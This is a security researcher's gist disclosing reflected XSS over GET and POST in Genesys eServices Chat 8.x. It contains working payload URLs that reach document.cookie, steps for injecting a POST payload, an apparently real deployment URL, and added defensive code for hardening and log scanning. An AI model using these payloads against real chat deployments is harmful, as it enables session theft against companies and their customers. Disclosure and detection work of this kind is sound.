@MortalP0ison
Created October 15, 2019 14:28
Gist: MortalP0ison/5fd584b4c85fa13281fdc918913446fa
Hi all,
My name is Luis Eduardo Jácome V. (a.k.a. Mortal_Poison) and I found a vulnerability (gXSS and pXSS, i.e. XSS through GET and POST parameters) in Genesys eServices Chat that affects versions 8.x.x.
First of all, if you find a Genesys eServices Chat instance with "<!-- Version 8.1.200.03 -->" in the HTML source, it is vulnerable:
A small PoC (for versions 8.1.x):
https://example.com/HtmlChatPanel.jsp?Email=%3C/Script/%3E%3CScript/%3E(confirm)(document.cookie)%3C/Script/%3E
http://example.com/HtmlChatFrameSet.jsp?email=%3C/Script/%3E%3CScript/%3E(confirm)(1)%3C/Script/%3E
https://example.com/HtmlChatPanel.jsp?ActionColor=%3C/Script/%3E%3CSvg/OnLoad=(confirm)(document.cookie)%3E&ClientNickNameColor=%3C/SCRIPT/%3E&AgentNickNameColor=008000&ClientMessageColor=1532a0&AgentMessageColor=708090&Logo=.%2FResource%2FImages%2Flogo.jpg&FontSize=3&FontName=arial&ShowSmiles=1&BackgroundColor=FFFFFF
The problem is that the application does not sanitize the "values" of the form correctly (HtmlChatFrameSet.jsp and/or HtmlChatPanel.jsp): whatever is sent in a parameter is written back into the page as-is.
The vulnerable file changes from one version of Genesys eServices Chat to another; however, in none of the versions is the form validated.
For versions whose HTML source contains "<!-- Version 8.1.000.07 -->", you can execute the following payload:
https://example.com/HtmlChatPanel.jsp?ActionColor=%3C/Script/%3E%3CSvg/OnLoad=(confirm)(document.cookie)%3E&ClientNickNameColor=%3C/SCRIPT/%3E&AgentNickNameColor=008000&ClientMessageColor=1532a0&AgentMessageColor=708090&Logo=.%2FResource%2FImages%2Flogo.jpg&FontSize=3&FontName=arial&ShowSmiles=1&BackgroundColor=FFFFFF
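The following is an added example, not code from this advisory or from Genesys. It models the bug described above (a request parameter copied verbatim into the output of HtmlChatPanel.jsp, in a script string and in a colour attribute) next to a hardened rendering that encodes each value for the context it lands in and allowlists the colour parameters. The template text, the parameter names used in it and the fallback colours are assumptions for illustration, not the vendor's actual JSP; the payload values are the advisory's own.

```javascript
// Added example: models the unsanitized reflection the advisory describes and the
// context-aware encoding that closes it. The page template below is an assumption,
// not Genesys' real HtmlChatPanel.jsp.

// Vulnerable model: parameter values land inside a <script> string literal and a
// colour attribute with no encoding at all.
function renderVulnerable(params) {
  return [
    '<!-- Version 8.1.200.03 -->',
    `<body bgcolor="#${params.BackgroundColor}">`,
    `<script>var email = "${params.Email}"; var actionColor = "${params.ActionColor}";</script>`,
    '</body>',
  ].join('\n');
}

// JavaScript string-literal encoding: every character outside [A-Za-z0-9] becomes
// \xHH or \uHHHH, so a value can neither close the quote nor emit "</script>".
function encodeJsString(value) {
  return String(value).replace(/[^A-Za-z0-9]/g, (c) => {
    const code = c.charCodeAt(0);
    return code < 0x100
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  });
}

// Colour parameters have a closed vocabulary (3 or 6 hex digits), so allowlist
// them instead of encoding; anything else falls back to a default (assumed values).
function safeHexColor(value, fallback) {
  return /^(?:[0-9A-Fa-f]{3}|[0-9A-Fa-f]{6})$/.test(String(value)) ? value : fallback;
}

// Hardened model: same page, each value encoded or validated for its context.
function renderHardened(params) {
  return [
    '<!-- Version 8.1.200.03 -->',
    `<body bgcolor="#${safeHexColor(params.BackgroundColor, 'FFFFFF')}">`,
    `<script>var email = "${encodeJsString(params.Email)}"; ` +
      `var actionColor = "${safeHexColor(params.ActionColor, '080008')}";</script>`,
    '</body>',
  ].join('\n');
}

// Crude breakout check: count <script and <svg tag openers in the output. The
// template itself contributes exactly one (<script>); anything beyond that came
// from a parameter.
function countTagOpeners(html) {
  return (html.match(/<(?:script|svg)\b/gi) || []).length;
}

// The advisory's own payloads, assembled as a constructed request.
const POC_PARAMS = {
  Email: '</Script/><Script/>(confirm)(document.cookie)</Script/>',
  ActionColor: '</Script/><Svg/OnLoad=(confirm)(document.cookie)>',
  BackgroundColor: 'FFFFFF',
};

if (typeof require !== 'undefined' && require.main === module) {
  console.log('vulnerable tag openers:', countTagOpeners(renderVulnerable(POC_PARAMS))); // 3
  console.log('hardened tag openers:', countTagOpeners(renderHardened(POC_PARAMS)));    // 1
  console.log(renderHardened(POC_PARAMS));
}
```

The point of the two render functions is that the fix is not a generic "strip < and >" filter: the Email value is written inside a JavaScript string, so it needs JavaScript string encoding (which also defuses the `</Script/>` closing-tag trick), while the colour fields need no encoding at all because only hex digits should ever reach the page.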
If the request is made with the POST method, you should see something like the following (it may vary, depending on the fields of the form):
cmd=connect&chat_alias=&first_name=null&last_name=null&email_address=%INJECT_HERE%&celular=null&subject=null&msg2send=&secure_key=&user_id=&script_pos=&session_id=&timeZoneOffset=-300
In the %INJECT_HERE% part you have to inject the malicious payload, for example: </Script/><Script/>(confirm)(1)</Script/>
Insert it without the "%" placeholder markers.
Remember that you must capture the request with an intercepting proxy; in my case, Burp Suite.
The product is used by many companies; however, not all instances are indexed by search engines.
https://example.com/HtmlChatPanel.jsp?ActionColor=080008&ClientNickNameColor=000019&AgentNickNameColor=0a82d8&ClientMessageColor=030717&AgentMessageColor=0074ce&Logo=https%3A%2F%2Fcontact.falabella.com%2FWebAPI812%2FSODIMAC_AR%2FChat%2FResources%2FImages%2Flogo.jpg&FontSize=13px&FontName=arial&ShowSmiles=0&BackgroundColor=FFFFFF
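For anyone running this product, the following added example (not part of the advisory) shows a small log check for the GET and POST vectors above: it flags requests to HtmlChatPanel.jsp or HtmlChatFrameSet.jsp whose decoded parameter values, from the query string or a POST body, contain markup. The log lines are constructed samples in Combined Log Format (the field layout is an assumption), the POST body is the advisory's with the placeholder replaced by its example payload in URL-encoded form, and the IP addresses are documentation ranges.

```javascript
// Added example: scan web-server log lines for exploitation attempts against the
// two affected JSPs. Sample log lines and the POST body are constructed.

const AFFECTED_PAGE = /\/(?:HtmlChatPanel|HtmlChatFrameSet)\.jsp$/i;
// A tag start, an on*= handler, or a javascript: URL inside a value that should be text.
const MARKUP = /<\/?[a-z]|\bon[a-z]+\s*=|javascript:/i;

// Decode one parameter, tolerating malformed %-escapes.
function decodeParam(raw) {
  try { return decodeURIComponent(raw.replace(/\+/g, ' ')); } catch (e) { return raw; }
}

// "k=v&k2=v2" -> [[k, decoded v], ...]
function parseQuery(qs) {
  return qs.split('&').filter(Boolean).map((pair) => {
    const i = pair.indexOf('=');
    return i < 0
      ? [decodeParam(pair), '']
      : [decodeParam(pair.slice(0, i)), decodeParam(pair.slice(i + 1))];
  });
}

// Names of parameters whose decoded value looks like markup; [] when the path is
// not one of the affected pages.
function suspiciousParams(path, body = '') {
  const q = path.indexOf('?');
  const file = q < 0 ? path : path.slice(0, q);
  const qs = q < 0 ? '' : path.slice(q + 1);
  if (!AFFECTED_PAGE.test(file)) return [];
  return parseQuery(qs).concat(parseQuery(body))
    .filter(([, value]) => MARKUP.test(value))
    .map(([name]) => name);
}

// Minimal Combined Log Format parser (assumed layout): client, time, method, path, status.
function parseLogLine(line) {
  const m = line.match(/^(\S+) \S+ \S+ \[([^\]]+)\] "([A-Z]+) (\S+) HTTP\/[\d.]+" (\d{3})/);
  return m ? { client: m[1], time: m[2], method: m[3], path: m[4], status: m[5] } : null;
}

// One finding per flagged request: { client, time, method, path, params }.
function scanLog(lines) {
  const findings = [];
  for (const line of lines) {
    const req = parseLogLine(line);
    if (!req) continue;
    const params = suspiciousParams(req.path);
    if (params.length) findings.push({ client: req.client, time: req.time, method: req.method, path: req.path, params });
  }
  return findings;
}

// Constructed sample log: two of the advisory's PoC URLs plus two benign requests.
const SAMPLE_LOG = [
  '203.0.113.5 - - [15/Oct/2019:14:28:00 +0000] "GET /HtmlChatPanel.jsp?Email=%3C/Script/%3E%3CScript/%3E(confirm)(document.cookie)%3C/Script/%3E HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
  '198.51.100.7 - - [15/Oct/2019:14:29:10 +0000] "GET /HtmlChatPanel.jsp?ActionColor=080008&ClientNickNameColor=000019&FontName=arial HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
  '192.0.2.9 - - [15/Oct/2019:14:30:45 +0000] "GET /HtmlChatPanel.jsp?ActionColor=%3C/Script/%3E%3CSvg/OnLoad=(confirm)(document.cookie)%3E&ClientNickNameColor=%3C/SCRIPT/%3E HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
  '192.0.2.9 - - [15/Oct/2019:14:31:02 +0000] "GET /index.jsp?q=%3Cscript%3E HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
];

// The advisory's POST body with %INJECT_HERE% replaced by its example payload (URL-encoded).
const SAMPLE_POST_BODY =
  'cmd=connect&chat_alias=&first_name=null&last_name=null&email_address=' +
  '%3C/Script/%3E%3CScript/%3E(confirm)(1)%3C/Script/%3E&celular=null&subject=&timeZoneOffset=-300';

if (typeof require !== 'undefined' && require.main === module) {
  console.log(scanLog(SAMPLE_LOG));
  console.log('POST:', suspiciousParams('/HtmlChatPanel.jsp', SAMPLE_POST_BODY));
}
```

Because the check runs on decoded values rather than on the raw URL, it is not defeated by the mixed-case `Script`/`SCRIPT` spellings or by double URL-encoding of the angle brackets; POST bodies are only visible if the server logs them, so for the pXSS vector the body has to come from a proxy or application log rather than the access log.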
Contact:
Twitter: @Mortal_Poison_
Youtube: https://youtube.com/XecureLabs
Web Page: https://xecure-labs.com
Affected versions:
Genesys eServices Chat 8.x.x
Tested on:
Firefox 50.0 and 60.0